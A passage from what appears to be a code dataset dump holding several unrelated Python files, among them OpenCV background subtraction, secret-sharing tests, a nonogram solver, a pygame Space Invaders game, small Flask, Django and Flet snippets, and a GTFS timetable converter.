video.isOpened():\n ret, frame = video.read()\n if not ret:\n break\n\n fgMask = backsub.apply(frame, learningRate=kwargs.get('learningRate', -1))\n\n fgMask = cv.morphologyEx(fgMask, cv.MORPH_OPEN, kernel_open)\n fgMask = cv.morphologyEx(fgMask, cv.MORPH_CLOSE, kernel_close)\n\n # 
Prepare the image for matching\n if kwargs.get('prepareMatching', False):\n prepareMatching(fgMask)\n\n # cv.imshow(\"fgMask\", fgMask)\n # cv.waitKey(25)\n\n masks.append(cv.cvtColor(fgMask, cv.COLOR_GRAY2BGR))\n if kwargs.get('display', False) and not showVideoFrameWithMask(frame, fgMask, fps):\n break\n\n # saves video file\n createCache(cacheName, cachePath, masks, videoId)\n\n # load video to return\n video = cv.VideoCapture(cachePath)\n return video\n\n\ndef loadCache(func_name: str, videoId: int, genNewCache: bool, kwargs: dict):\n kwargs.pop('display', None)\n kwargs.pop('genNewCache', None)\n kwargs_str = str(kwargs).replace(\" \", \"_\").replace(\":\", \"_\").replace(\",\", \"_\").replace(\"=\", \"_\").replace(\"{\", \"_\") \\\n .replace(\"}\", \"_\").replace(\"'\", \"\").replace(\"_\", \"\")\n cacheName = f'{func_name}__{kwargs_str}.avi'\n cachePath = os.path.join(f'out/cache/{videoId}/{cacheName}')\n if not genNewCache:\n # checks if file exists name is based on the parameters\n if os.path.isfile(cachePath):\n # loads video file and returns it\n video = cv.VideoCapture(cachePath)\n return video, cacheName, cachePath\n else:\n print(\"Cache file not found at Path: \" + cachePath)\n\n return None, cacheName, cachePath\n\n\ndef ownBGSubMedian(video: cv.VideoCapture, videoId: int, fps: int = 30, genNewCache: bool = False,\n **kwargs) -> cv.VideoCapture:\n cached_video, cacheName, cachePath = loadCache(\"Median\", videoId, genNewCache, kwargs)\n if cached_video is not None:\n return cached_video\n\n frames = []\n video.set(cv.CAP_PROP_POS_FRAMES, 0)\n for _ in range(kwargs.get('n', 10)):\n ret, frame = video.read()\n if not ret:\n break\n frames.append(frame)\n median = np.median(frames, axis=0).astype(np.uint8)\n\n masks = []\n video.set(cv.CAP_PROP_POS_FRAMES, kwargs.get('n', 10))\n while video.isOpened():\n ret, frame = video.read()\n if not ret:\n break\n\n # Subtract the median from the current frame\n fgMask = cv.absdiff(frame, median)\n\n # Conversion to 2 bit image\n fgMask = cv.cvtColor(fgMask, cv.COLOR_BGR2GRAY)\n fgMask = cv.threshold(fgMask, kwargs.get('thresholdMin', 50),\n kwargs.get('thresholdMax', 255), cv.THRESH_BINARY)[1]\n\n # closing with circles\n fgMask = cv.morphologyEx(fgMask, cv.MORPH_CLOSE, cv.getStructuringElement(cv.MORPH_ELLIPSE, (5, 5)))\n\n # Prepare the image for matching\n if kwargs.get('prepareMatching', False):\n prepareMatching(fgMask)\n\n masks.append(fgMask)\n\n if kwargs.get('display', False) and not showVideoFrameWithMask(frame, fgMask, fps):\n break\n\n # saves video file\n createCache(cacheName, cachePath, masks, videoId)\n\n # load video to return\n video = cv.VideoCapture(cachePath)\n return video\n\n\ndef showVideoFrameWithMask(frame: np.ndarray, mask: np.ndarray, fps: int = 30):\n \"\"\" Shows the frame and the mask in two windows\n\n :param frame: The frame to show\n :param mask: The mask to show\n :param fps: The fps of the video\n \"\"\"\n\n cv.imshow(\"Frame\", frame)\n cv.imshow(\"FG Mask\", mask)\n\n keyboard = cv.waitKey(1000 // fps)\n if keyboard == 27 or (keyboard == 32 and cv.waitKey(0) == 27):\n return False\n return True\n\n\ndef prepareMatching(fgMask: np.ndarray):\n \"\"\" Prepares the image for matching\n It changes 0 to 1 and 255 to 254\n\n :param fgMask: The image to prepare\n \"\"\"\n fgMask[(fgMask == 0)] = 1\n fgMask[(fgMask == 255)] = 254\n\n\nif __name__ == \"__main__\":\n 
pass\n","repo_name":"DeeDz-x/ComputerVision22-23","sub_path":"cv/processing/bgsubtraction.py","file_name":"bgsubtraction.py","file_ext":"py","file_size_in_byte":7267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35941543375","text":"import pandas as pd\nimport yaml\nimport random\nfrom setup import *\nfrom share import share\nfrom reconstruct import reconstruct\nfrom reconstruction_tools import dict_to_list\nfrom determinant import *\nfrom function_tools import print_function\nfrom renew import renew\nfrom reset import reset\nfrom add import add\nfrom add_tools import merge_data\nfrom path import get_data_path\nfrom linear import create_shares_for_messages\nfrom multiply import multiply\n\n# random.seed(42)\n\n# path to DATA directory\ndata_path = get_data_path()\n\nprime = 997\nprint_statements = False\n\n\n# main testframe\n# tests all given examples in 'tassa_setups.yaml' for setup, share, reconstruct, add, renew, reset, multiply\n# (implicitly also pre_mult and linear)\ndef main():\n print(\"\\n\" * 10)\n\n with open(\"tassa_setups.yaml\", 'r') as stream:\n try:\n docs = yaml.load_all(stream)\n except yaml.YAMLError as exc:\n print(exc)\n sys.exit(1)\n for doc in docs:\n thresholds = doc['thresholds']\n people = doc['people']\n name = doc['name']\n disjunctive_name = \"{}_dis\".format(name)\n for setup_name in [name, disjunctive_name]:\n print(\"Name: {}\\nPeople per level: {}\\nThresholds: {}\".format(setup_name, people, thresholds))\n print(\"Field size is {}\".format(prime))\n levels = merge_data(people, thresholds)\n random_message = random.randint(0, prime - 1)\n print(\"Generated message is {}\".format(random_message))\n # setup\n test_setup(levels, setup_name)\n # share\n original_function, original_shares = test_share(random_message, setup_name)\n # reconstruct\n original_determinant, other_determinants = test_reconstruct(original_function, original_shares,\n random_message, setup_name, thresholds)\n # renew\n test_renew(random_message, setup_name)\n # reset\n old_shares = test_reset(levels, original_determinant, other_determinants, setup_name)\n # add\n test_add(old_shares, original_function, random_message, setup_name)\n # multiply\n test_multiply(setup_name)\n print(\"~\" * 100)\n print(\"Operation successfully accomplished.\")\n\n\ndef test_multiply(setup_name):\n shares_of_messages_for_multiply, _, _ = create_shares_for_messages(setup_name, np.random.randint(0, prime-1),\n np.random.randint(0, prime-1))\n print(\"\\nCalling multiply('{}', {})\".format(setup_name, shares_of_messages_for_multiply))\n shares = multiply(setup_name, shares_of_messages_for_multiply, print_statements=print_statements)\n print(\"Multiply successful. 
Computed messages: {}\".format(shares))\n\n\ndef test_add(old_shares, original_function, random_message, setup_name):\n # get all possible shareholder IDs to be added\n max_options = get_options_for_add(old_shares)\n # call add on each of those options\n for option in max_options:\n print(\"\\nCalling add('{}', {}, {}\".format(setup_name, old_shares, option))\n add_shares, add_result = add(setup_name, old_shares, option, print_statements=print_statements,\n function_f=original_function)\n if add_shares == add_result == -1:\n print(\"add could not be tested due to overflow in linear reconstruction\\n\\n\\n\")\n else:\n print(\"New shares after add {} are:\".format(option))\n for each_share in add_shares:\n print(each_share, \":\", add_shares[each_share])\n if add_result == random_message:\n print(\"Shareholders reconstruct to message {}, add successful.\".format(add_result))\n\n\n# get all options for IDs that can be added\n# e.g in a setup where (1,0) and (2,1) exist, possible options would be\n# (3,0) or (3,1) -> Max person ID + 1 in all already existing levels\ndef get_options_for_add(old_shares):\n max_options = []\n j_s = []\n used = []\n share_list = dict_to_list(old_shares)\n for item in share_list:\n j_value = item[0].split('_')\n j_value = j_value[2]\n j_s.append(j_value)\n # search for all levels where we can add a person\n for idx, j in enumerate(j_s):\n try:\n if not j_s[idx] == j_s[idx + 1]:\n max_options.append(share_list[idx][0])\n used.append(j)\n except IndexError:\n if not j_s[idx] in used:\n max_options.append(share_list[idx][0])\n used.append(j)\n # save all options as a list\n max_options = [(int(item.split('_')[1]) + 1, int(item.split('_')[2])) for item in max_options]\n return max_options\n\n\ndef test_reset(levels, original_determinant, other_determinants, setup_name):\n other_determinants.insert(0, original_determinant)\n old_shares = old_shares_to_dict(setup_name)\n new_structure2 = create_new_level_structure(levels, levels[-1][0] + 3, levels[-1][1] + 3, 1)\n print(\"\\nCalling reset('{}', {}, new_shares={}):\".format(setup_name, old_shares, new_structure2))\n shares = reset(setup_name, old_shares, new_shares=new_structure2, print_statements=print_statements)\n print(\"New shares after reset are:\")\n for each_share in shares:\n print(each_share, \":\", shares[each_share])\n print(\"Reset successful.\")\n return old_shares\n\n\n# create a new level structure to reset the setup on\ndef create_new_level_structure(levels, people_in_last_level, threshold_in_last_level, structure):\n new_structure = levels.copy()\n new_structure[-1] = ([people_in_last_level, threshold_in_last_level])\n new_structure2 = levels.copy()\n new_structure2.append([1, levels[-1][1] + 1])\n if structure is 1:\n return new_structure\n else:\n return new_structure2\n\n\ndef test_renew(random_message, setup_name):\n print(\"\\nCalling renew('{}', {}):\"\n .format(setup_name, \"{'shares': 'all'}\"))\n resulting_shares, renew_result = renew(setup_name, {'shares': 'all'}, print_statements=print_statements)\n print(\"Resulting shares after renew are:\")\n for each_share in resulting_shares:\n print(\"{} : {}\".format(each_share, resulting_shares[each_share]))\n if renew_result == random_message:\n print(\"New Result ({}) is the same as the original message, renew successful.\".format(renew_result))\n else:\n print(\"WTF?! 
{} != {} (in renew)\".format(renew_result, random_message))\n\n\ndef test_reconstruct(original_function, original_shares, random_message, setup_name, thresholds):\n print(\"\\nCalling reconstruct('{}', number_of_people={}, \"\n \"random_subset=True, subset={{}}, print_statements=False):\"\n .format(setup_name, thresholds[-1]))\n try:\n secret, resulting_function, original_determinant, other_determinants, matrix \\\n = reconstruct(setup_name, thresholds[-1], print_statements=print_statements)\n except TypeError as e:\n print(\"Could not reconstruct to a valid integer-result (test_setups): {}\".format(e))\n sys.exit(1)\n if not secret == random_message:\n print(\"Reconstruction in setup {} calculated an incorrect result (should be {} but was {})\"\n .format(setup_name, random_message, secret))\n sys.exit(1)\n else:\n print(\"The reconstructed function is\\t{}, the message is\\t{}\\n\\t\"\n \"(Original function was\\t{} with secret\\t{})\"\n .format(print_function(resulting_function, printed=False), secret,\n print_function(original_function, printed=False), random_message))\n print(\"\\nOriginal shares were:\")\n for each_share in original_shares:\n print(each_share, \":\", original_shares[each_share])\n return original_determinant, other_determinants\n\n\ndef test_share(random_message, setup_name):\n print(\"\\nCalling share('{}', {}, prime_number={}, print_statements=False):\"\n .format(setup_name, random_message, prime))\n original_function, original_shares = share(setup_name, random_message, field_size=prime,\n print_statements=print_statements)\n return original_function, original_shares\n\n\ndef test_setup(levels, setup_name):\n delete_setup(setup_name)\n print(\"\\nCalling setup('{}', {}):\".format(setup_name, levels))\n setup(setup_name, levels, field_size=prime)\n\n\ndef old_shares_to_dict(name):\n all_shares = {}\n shares_path = os.path.join(data_path, name, 'shares.csv')\n shares = pd.read_csv(shares_path, skiprows=0, header=0, delimiter=',', )\n tuples = [tuple(x) for x in shares.values]\n for (x, y) in tuples:\n all_shares[x] = y\n print(all_shares)\n return all_shares\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"PaulMoritz/Secret-Sharing-in-Comparison","sub_path":"code_tested/code/hss/test_setups.py","file_name":"test_setups.py","file_ext":"py","file_size_in_byte":8937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37380989146","text":"import copy\nimport queue\n\n###############################################################\n###############################################################\n\n\ndef read_input():\n global width, height, dr, dc\n fin = open(\"zad_input.txt\", 'r')\n line = fin.readline()[:-1]\n xy = line.split(\" \")\n height = int(xy[0])\n width = int(xy[1])\n sdr = []\n for i in range(height):\n line = fin.readline()[:-1]\n ts = line.split(\" \")\n ti = []\n for c in ts:\n ti.append(int(c))\n sdr.append(tuple(ti))\n dr = tuple(sdr)\n sdc = []\n for i in range(width):\n line = fin.readline()[:-1]\n ts = line.split(\" \")\n ti = []\n for c in ts:\n ti.append(int(c))\n sdc.append(tuple(ti))\n dc = tuple(sdc)\n fin.close()\n return width, height, dr, dc\n\n\ndef write_output(tab):\n fout = open(\"zad_output.txt\", 'w')\n for t in tab:\n for i in t:\n if i:\n fout.write(znak[1])\n else:\n fout.write(znak[0])\n fout.write(\"\\n\")\n print(\"euuuuuuuuuurekaaaaaaaaaaa!!!\")\n fout.close()\n exit()\n\n\ndef no_solution():\n print(\"przegraliśmy :'(\")\n exit()\n\n\ndef printtab(tab):\n for t in 
tab:\n for i in t:\n if i:\n print(znak[1], end=\"\")\n else:\n print(znak[0], end=\"\")\n print()\n print()\n\n\ndef printline(line):\n for i in line:\n if i:\n print(znak[1], end=\"\")\n else:\n print(znak[0], end=\"\")\n print()\n\n\n########################################################################################################################\n########################################################################################################################\n\ndef next_fit(t, length, fir, d):\n n = len(d)-1\n if fir[n] + d[n] == length:\n n -= 1\n while n >= 0 and t[fir[n] + d[n] + 1]:\n n -= 1\n if n < 0:\n return True, t, fir\n t[fir[n]] = False\n t[fir[n] + d[n]] = True\n fir[n] += 1\n for i in range(n + 1, len(d)):\n fir[i] = fir[i-1] + d[i-1] + 1\n for j in range(fir[i], fir[i] + d[i]):\n t[j] = True\n t[fir[i] - 1] = False\n if fir[i] + d[i] < length:\n t[fir[i] + d[i]] = False\n for j in range(fir[len(d)-1] + d[len(d)-1], length):\n t[j] = False\n else:\n t[fir[n]] = False\n t[fir[n] + d[n]] = True\n fir[n] += 1\n return False, t, fir\n\n\ndef all_fits(d, length):\n t = []\n fir = []\n for k in d: # k = długość bloku\n fir.append(len(t))\n for i in range(k):\n t.append(True)\n t.append(False)\n t = t[:-1]\n if len(t) > length:\n return False\n for i in range(len(t), length):\n t.append(False)\n possibles = [t]\n possible_starts = [fir]\n while True:\n koniec, t, fir = next_fit(copy.deepcopy(t), length, copy.deepcopy(fir), d)\n if koniec:\n break\n possibles.append(t)\n possible_starts.append(fir)\n\n return possibles\n\n\ndef revise_one(possibles, length, fix1):\n if len(possibles) == 0:\n no_solution()\n elif len(possibles) == 1:\n fix1 = [True for _ in range(length)]\n else:\n for i in range(length):\n if not fix1[i]:\n fix1[i] = True\n for p in possibles:\n if p[i] != possibles[0][i]:\n fix1[i] = False\n break\n return fix1\n\n\ndef revise_two(a, b, wzor, dom, fix, length):\n revised = False\n k = []\n for p in dom[b]:\n if p[a] == wzor:\n k.append(p)\n else:\n revised = True\n dom[b] = k\n if revised:\n fix[b] = revise_one(dom[b], length, fix[b])\n if not fix[b][a]:\n print(\"dalej niedziałaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!!!!!!!!!!!!!!\")\n exit()\n return revised\n # wyrzuć z dziedziny wszystkie dopasowania, które nie mają danego piksela we właściwym ustawieniu\n # ustaw piksel jako fixed\n\n\ndef queue_init():\n que = queue.Queue()\n for r in range(height):\n for c in range(width):\n que.put((r, c, True))\n que.put((r, c, False))\n return que # dodaj wszystkie piksele na kolejkę\n\n\ndef possibles_init(d, siz1, siz2):\n pss = []\n for i in range(siz1):\n pss.append(all_fits(d[i], siz2))\n return pss\n\n\ndef fixed_init(pss, siz1, siz2):\n fix = []\n for i in range(siz1):\n fix.append(revise_one(pss[i], siz2, [False for _ in range(siz2)]))\n return fix\n\n\ndef ac3():\n que = queue_init() # (row, col, r/c)\n possibles_rows = possibles_init(dr, height, width)\n possibles_cols = possibles_init(dc, width, height)\n fixed_r = fixed_init(possibles_rows, height, width)\n fixed_c = fixed_init(possibles_cols, width, height)\n while not que.empty():\n x = que.get() # (row, col, r/c)\n\n if x[2] and fixed_r[x[0]][x[1]]: # and not fixed_c[x[1]][x[0]]:\n # print(\"row -> col\", x)\n if revise_two(x[0], x[1], possibles_rows[x[0]][0][x[1]], possibles_cols, fixed_c, height):\n for i in range(height):\n que.put((i, x[1], False))\n\n if (not x[2]) and fixed_c[x[1]][x[0]]: # and not fixed_r[x[0]][x[1]]:\n # print(\"col -> row\", x)\n if revise_two(x[1], x[0], 
possibles_cols[x[1]][0][x[0]], possibles_rows, fixed_r, width):\n for i in range(width):\n que.put((x[0], i, True))\n\n for i in range(height):\n for j in range(width):\n if fixed_r[i][j] != fixed_c[j][i]:\n print(\"fixed się źle ustawiają\", i, j)\n\n finish_check(possibles_rows)\n\n\ndef finish_check(possibles_rows):\n koniec = True\n for r in possibles_rows:\n if len(r) > 1:\n koniec = False\n break\n if koniec:\n t = []\n for r in possibles_rows:\n t.append(r[0])\n write_output(t)\n\n########################################################################################################################\n\n\nglobal width, height, dr, dc\nznak = (\".\", \"#\")\n\nread_input()\nac3()\nprint(\"przegraliśmy :'(\")\n","repo_name":"WeronikaTarnawska/pracownie-ai","sub_path":"3_1_obrazki.py","file_name":"3_1_obrazki.py","file_ext":"py","file_size_in_byte":6300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34743234398","text":"import pygame\nimport random\nfrom settings import *\nfrom sprites import Player, Enemy, Missile, Block, Explosion\n# in terminal -> pip install pygame\n\nSIZE = (DISPLAY_WIDTH, DISPLAY_HEIGHT)\nFPS = 60\n\n##########################################################################\n\npygame.init()\n\n\ndef start_screen():\n screen = pygame.display.set_mode(SIZE)\n pygame.display.set_caption(\"Space Invaders\")\n\n clock = pygame.time.Clock()\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n running = False\n\n screen.fill(BLACK)\n pygame.display.flip()\n\n clock.tick(FPS)\n\n\ndef game_over():\n screen = pygame.display.set_mode(SIZE)\n pygame.display.set_caption(\"Space Invaders\")\n\n clock = pygame.time.Clock()\n running = True\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n return False\n if event.key == pygame.K_RETURN:\n return True\n\n screen.fill(BLACK)\n pygame.display.flip()\n\n clock.tick(FPS)\n\n\ndef play():\n\n screen = pygame.display.set_mode(SIZE)\n pygame.display.set_caption(\"Space Invaders\")\n\n # sounds\n fire_sound = pygame.mixer.Sound(\"Assets/shoot.wav\")\n enemy_kill = pygame.mixer.Sound(\"Assets/invaderkilled.wav\")\n\n # score\n score = 0\n score_object = SM_FONT.render(f\"Score: {score}\", True, WHITE)\n score_rect = score_object.get_rect()\n score_rect.center = 100, 20\n\n # sprite groups\n player_group = pygame.sprite.Group() # create sprite group for player\n enemy_group = pygame.sprite.Group()\n all_sprites = pygame.sprite.Group() # group for all sprites\n missile_group = pygame.sprite.Group()\n block_group = pygame.sprite.Group()\n explosion_group = pygame.sprite.Group()\n\n # Player\n player = Player(\"Assets/player.png\") # create player object\n player_group.add(player) # add player to group\n all_sprites.add(player)\n\n # Enemy\n offset_x = 30\n offset_y = 100\n v_scale = DISPLAY_HEIGHT // 18\n h_scale = DISPLAY_WIDTH // 12\n for row in range(5):\n if row == 1:\n enemy_img = RED_ALIEN\n elif 1 < row < 4: enemy_img = GREEN_ALIEN\n else:\n enemy_img = YELLOW_ALIEN\n for col in range(11):\n x_pos = col*h_scale + offset_x\n y_pos = row*v_scale + offset_y\n enemy = Enemy(enemy_img, x_pos, y_pos)\n enemy_group.add(enemy)\n\n # create shields\n start_values = [75, 200, 325, 450]\n for start in start_values:\n for 
row_index, row in enumerate(SHEILD):\n # print(row_index, row)\n for col_index, col in enumerate(row):\n if col == 'x':\n x_pos = col_index*BLOCK_WIDTH + start\n y_pos = row_index*BLOCK_HEIGHT + 500\n block = Block(screen, x_pos, y_pos)\n block_group.add(block)\n all_sprites.add(block)\n\n clock = pygame.time.Clock()\n enemy_direction = 1\n\n running = True\n playing = 10000\n\n while running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_SPACE:\n missile = Missile(player.rect.centerx - MISSILE_WIDTH//2,\n player.rect.top)\n missile_group.add(missile)\n all_sprites.add(missile)\n fire_sound.play()\n\n # hit detection\n enemy_death = pygame.sprite.groupcollide(missile_group, enemy_group, True, True)\n if enemy_death:\n enemy_kill.play()\n score += 10\n for hit in enemy_death:\n explosion = Explosion(hit.rect.center)\n explosion_group.add(explosion)\n all_sprites.add(explosion)\n\n playing -= 1000\n if playing == 0:\n running = False\n\n # game logic\n\n enemies = enemy_group.sprites()\n # rand_enemy = random.choice(enemies)\n\n # bomb = Bomb(rand_enemy.rect.centerx, rand_enemy.rect.bottom)\n\n for enemy in enemies:\n if enemy.rect.right >= DISPLAY_WIDTH:\n enemy_direction = -1\n\n if enemies:\n for alien in enemies:\n alien.rect.y += 2\n\n elif enemy.rect.x <= 0:\n enemy_direction = 1\n\n if enemies:\n for alien in enemies:\n alien.rect.y += 2\n\n screen.fill(BLACK)\n\n # sprite groups\n missile_group.draw(screen)\n player_group.draw(screen)\n enemy_group.draw(screen)\n block_group.draw(screen)\n explosion_group.draw(screen)\n\n enemy_group.update(enemy_direction)\n all_sprites.update()\n\n # text\n score_object = SM_FONT.render(f\"Score: {score}\", True, WHITE)\n screen.blit(score_object, score_rect)\n\n pygame.display.flip()\n\n clock.tick(FPS)\n\n\nstart_screen()\nplaying = True\nwhile True:\n play()\n playing = game_over()\n\npygame.quit()\n","repo_name":"CameronChadwick/spriteIntro","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30077929738","text":"\"\"\"\nThis module implements response for search requests\n\"\"\"\nfrom urllib.parse import parse_qs\nimport src.service.database_queries as service\nfrom flask_restful import Resource\nfrom src.rest.resources.wrappers import check_authorisation\nfrom src.schemas.employee import EmployeeSchema\nfrom datetime import date\n\nclass SearchEmployeeApi(Resource):\n \"\"\"\n Class for search restfull resource\n \"\"\"\n employee_schema = EmployeeSchema()\n\n @check_authorisation\n def get(self, search_query):\n \"\"\"\n get method for search request\n :param search_query: search query with parameters\n :return: employees data in json, if such employees exists\n \"\"\"\n params = parse_qs(search_query)\n if \"email\" in params.keys():\n employee = service.get_employee_by_email(params[\"email\"][0])\n return self.employee_schema.dump(employee), 200\n department_id = int(params[\"department\"][0]) if params.get(\"department\") else False\n name = params[\"name\"][0] if params.get(\"name\") else False\n start_date = params[\"start_date\"][0] if params.get(\"start_date\") else False\n end_date = params[\"end_date\"][0] if params.get(\"end_date\") else False\n employees = service.search_employees(name, department_id, start_date, end_date)\n return self.employee_schema.dump(employees, many=True), 
200\n","repo_name":"akopika/epam_project","sub_path":"src/rest/resources/search_employee.py","file_name":"search_employee.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24811681696","text":"from django.contrib import admin\nfrom django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('',views.lockhome,name='lockhome'),\n path('login/',views.login,name='login'),\n path('sign/',views.sign,name='sign'),\n path('logout/',views.logout,name='logout'),\n path('joboffers/',views.post_a_job,name='post_a_job'),\n path('profile/',views.profile,name='profile'),\n]","repo_name":"hemant-17/algorithm6.0","sub_path":"lock/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"32336200807","text":"a = \"Winter Is Coming!\"\nstr_2 = ''\nfor letter in a:\n\tif letter.isupper():\n\t\tstr_2 = str_2 + letter.lower()\n\telif letter.islower():\n\t\tstr_2 = str_2 + letter.upper()\n\telse:\n\t\tprint(letter)\nprint (str_2)","repo_name":"anusha2398/Python-Projects","sub_path":"prog4.py","file_name":"prog4.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72476177762","text":"import pygame\nfrom config.conf import SCREEN_WIDTH, SCREEN_HEIGHT, FPS\nfrom game.game import Game\n\n\ndef main():\n pygame.init()\n pygame.mixer.init()\n screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n pygame.display.set_caption(\"Soul Hunter\")\n clock = pygame.time.Clock()\n\n game = Game(screen)\n\n while True:\n game.get_events()\n game.update_screen()\n game.update_music()\n pygame.display.update()\n clock.tick(FPS)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"SaeedAlian/soulhunter_game","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37172489945","text":"import flet as ft\n\n\ndef main(page: ft.Page):\n def on_column_scroll(e: ft.OnScrollEvent):\n print(\n f\"Type: {e.event_type}, pixels: {e.pixels}, min_scroll_extent: {e.min_scroll_extent}, max_scroll_extent: {e.max_scroll_extent}\"\n )\n\n cl = ft.Column(\n spacing=10,\n height=200,\n width=200,\n scroll=ft.ScrollMode.ALWAYS,\n on_scroll=on_column_scroll,\n )\n for i in range(0, 50):\n cl.controls.append(ft.Text(f\"Text line {i}\", key=str(i)))\n\n page.add(\n ft.Container(cl, border=ft.border.all(1)),\n )\n\n\nft.app(main)\n","repo_name":"flet-dev/examples","sub_path":"python/controls/column/scroll-events.py","file_name":"scroll-events.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":296,"dataset":"github-code","pt":"54"} +{"seq_id":"72954071522","text":"from string import digits\nimport os\n\n#TODO: Check 'UP'\n\nTRANSLATION = {'00': 'MA-PE', '25': 'MA-TO', '13': 'MA', '14': 'TI', '11': 'KE', '03': 'TO', '04': 'PE', '05': 'LA', '06': 'SU', 'UP': 'UP'}\nWEEKDAY_TRANSLATION = {'00': [1,1,1,1,1,0,0], '25': [1,1,1,1,0,0,0], '13': [1,0,0,0,0,0,0], '14': [0,1,0,0,0,0,0], '11': [0,0,1,0,0,0,0], '03': [0,0,0,1,0,0,0], '04': [0,0,0,0,1,0,0], '05': [0,0,0,0,0,1,0], '06': [0,0,0,0,0,0,1], 'UP': [0,0,0,0,0,0,0]}\n\ndigit_trans = str.maketrans('a','a',digits)\n\ncurrent_route = ''\ncalendar = ''\nroute = ''\ntrip_id 
= ''\nvalid = False\nsidx = 1\n\ncalendars = []\ncalendar_objs = {}\nroutes = []\ntrips = []\ntrip_objs = {}\nstoptimes = []\nany_stops = False\n\nstops = set([])\nmissing_stops = set([])\n\nfor stop in open('gtfs/stops.txt'):\n stops.add(stop.split(',')[0])\n\nheadsigns = {}\nfor route in open('./routes.csv'):\n headsigns[route.split(',')[0]] = route.split(',')[1].strip()\n\ndef getCalendar(sched_type, start, end):\n calendar = TRANSLATION[sched_type] + '_' + start + '_' + end\n weekdays = WEEKDAY_TRANSLATION[sched_type]\n if end == '':\n end = '20160619'\n if start == '':\n start = '20150810'\n return {'service_id': calendar, 'monday': weekdays[0], 'tuesday': weekdays[1], 'wednesday': weekdays[2], 'thursday': weekdays[3], 'friday': weekdays[4], 'saturday': weekdays[5], 'sunday': weekdays[6], 'start_date': start, 'end_date': end}\n\ndef getTime(time):\n return time[:2] + ':' + time[2:4] + ':' + time[4:]\n\nfor f in os.listdir('.'):\n if not f.endswith('.exp'):\n continue\n print(f)\n for line in open(f, encoding='ISO_8859-15'):\n elements = line.strip().split(';')\n if elements[0] == '1':\n pass\n elif elements[0] == '2':\n pass\n elif elements[0] == '3':\n calendar = getCalendar(elements[2], elements[5], elements[6])\n if not calendar['service_id'] in calendars:\n calendars.append(calendar['service_id'])\n calendar_objs[calendar['service_id']] = calendar\n calendar = calendar['service_id']\n\n elif elements[0] == '4':\n pass\n elif elements[0] == '5':\n if any_stops == False:\n #print ('No stops for ' + trip_id + ' on route ' + route)\n pass\n any_stops = False\n valid = elements[5] == '0'\n if not valid:\n #print('Siirtoajo')\n #print(elements)\n continue\n route = elements[6] + elements[8].translate(digit_trans)\n if route == '':\n print('Empty route' + str(elements))\n if not route in routes:\n routes.append(route)\n trip_id = elements[3]\n if not trip_id in trips:\n trips.append(trip_id)\n direction = str(int(elements[18])-1)\n shape_id = route + \"_\" + elements[18]\n headsign = headsigns[shape_id] if shape_id in headsigns else \"missing!\"\n\n\n trip_objs[trip_id] = {'route_id': route, 'service_id': calendar, 'trip_id': trip_id, 'direction_id': direction, 'shape_id': shape_id, 'trip_headsign': headsign}\n sidx = 1\n else:\n print('Duplicate trip' + trip_id)\n elif elements[0] == '6':\n if valid:\n if elements[3] == '':\n #print(elements)\n continue\n if elements[3] not in stops:\n missing_stops.add(elements[3])\n any_stops = True\n stop_id = elements[3]\n time = getTime(elements[8])\n timepoint = elements[11] == 'a' and '1' or '0'\n stoptimes.append({'trip_id': trip_id, 'arrival_time': time, 'departure_time': time, 'stop_id': stop_id, 'stop_sequence': sidx,'timepoint': timepoint})\n sidx += 1\n\nimport csv\n\nwith open('gtfs/calendar.txt', 'w') as csvfile:\n fieldnames = ['service_id', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday', 'start_date', 'end_date']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n writer.writeheader()\n for calendar in calendar_objs.values():\n writer.writerow(calendar)\n\nwith open('gtfs/routes.txt', 'w') as csvfile:\n fieldnames = ['route_id', 'route_short_name', 'route_type', 'agency_id']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\n writer.writeheader()\n for route in routes:\n route_short_name = ''\n route_type = ''\n if route[0] == '3':\n route_short_name = route[4]\n route_type = '2'\n elif route[0:4] == '1300':\n route_short_name = 'Metro'\n route_type = '1'\n elif route[0:4] == '1019':\n 
